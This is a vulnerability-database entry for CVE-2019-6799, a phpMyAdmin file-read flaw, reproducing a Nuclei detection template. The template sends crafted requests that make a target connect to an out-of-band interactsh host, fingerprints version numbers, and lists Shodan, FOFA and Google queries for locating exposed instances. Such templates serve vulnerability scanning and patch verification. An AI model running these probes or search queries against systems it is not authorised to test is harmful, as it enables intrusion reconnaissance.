Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-6799
HistoryMar 14, 2023 - 1:28 p.m.

phpMyAdmin <4.8.5 - Local File Inclusion

2023-03-1413:28:18
ProjectDiscovery
github.com
39
cve
phpmyadmin
mysql
local file inclusion
intrusion
sql injection
medium severity

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

CVSS3

5.9

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

5.7

Confidence

High

EPSS

0.119

Percentile

95.4%

phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.
id: CVE-2019-6799

info:
  name: phpMyAdmin <4.8.5 - Local File Inclusion
  author: pwnhxl
  severity: medium
  description: |
    phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
  remediation: |
    Upgrade phpMyAdmin to version 4.8.5 or later to mitigate this vulnerability.
  reference:
    - https://paper.seebug.org/1112/#_4
    - https://github.com/phpmyadmin/phpmyadmin/commit/828f740158e7bf14aa4a7473c5968d06364e03a2
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6799
    - https://github.com/rmb122/rogue_mysql_server
    - https://github.com/vulnspy/phpmyadmin-4.8.4-allowarbitraryserver
    - https://nvd.nist.gov/vuln/detail/CVE-2019-6799
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 5.9
    cve-id: CVE-2019-6799
    epss-score: 0.1829
    epss-percentile: 0.96069
    cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: phpmyadmin
    product: phpmyadmin
    shodan-query:
      - title:"phpmyadmin"
      - http.title:"phpmyadmin"
      - http.component:"phpmyadmin"
      - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin"
    fofa-query:
      - body="pma_servername" && body="4.8.4"
      - title="phpmyadmin"
    google-query: intitle:"phpmyadmin"
    hunter-query:
      - app.name="phpMyAdmin"&&web.body="pma_servername"&&web.body="4.8.4"
      - app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4"
  tags: cve,cve2019,phpmyadmin,mysql,lfr,intrusive,sqli

http:
  - raw:
      - |
        GET {{path}}?pma_servername={{interactsh-url}}&pma_username={{randstr}}&pma_password={{randstr}}&server=1 HTTP/1.1
        Host: {{Hostname}}

    payloads:
      path:
        - /index.php
        - /pma/index.php
        - /pmd/index.php
        - /phpMyAdmin/index.php
        - /phpmyadmin/index.php
        - /_phpmyadmin/index.php

    attack: batteringram
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - compare_versions(version, '< 4.8.5')

      - type: dsl
        dsl:
          - compare_versions(version, '> 3.9.9')

      - type: dsl
        dsl:
          - compare_versions(phpversion, '< 7.3.4')

      - type: word
        part: interactsh_protocol
        words:
          - dns

      - type: word
        words:
          - mysqli_real_connect

      - type: word
        words:
          - pma_servername

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - \?v=([0-9.]+)
        internal: true

      - type: regex
        group: 1
        regex:
          - \?v=([0-9.]+)

      - type: regex
        name: phpversion
        group: 1
        regex:
          - "X-Powered-By: PHP/([0-9.]+)"
        internal: true
        part: header
# digest: 480a00453043021f046cd821d36c9b1e7631057610cc491d58a1aa89538b67f077b98b22a9c63102201ea24971ec29e4b1165bd9eb6aa58a66f4f4f7c8e0b6c5f9460b93438b9dcd51:922c64590222798bb761d5b6d8e72950

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:N/A:N

CVSS3

5.9

Attack Vector

NETWORK

Attack Complexity

HIGH

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N

AI Score

5.7

Confidence

High

EPSS

0.119

Percentile

95.4%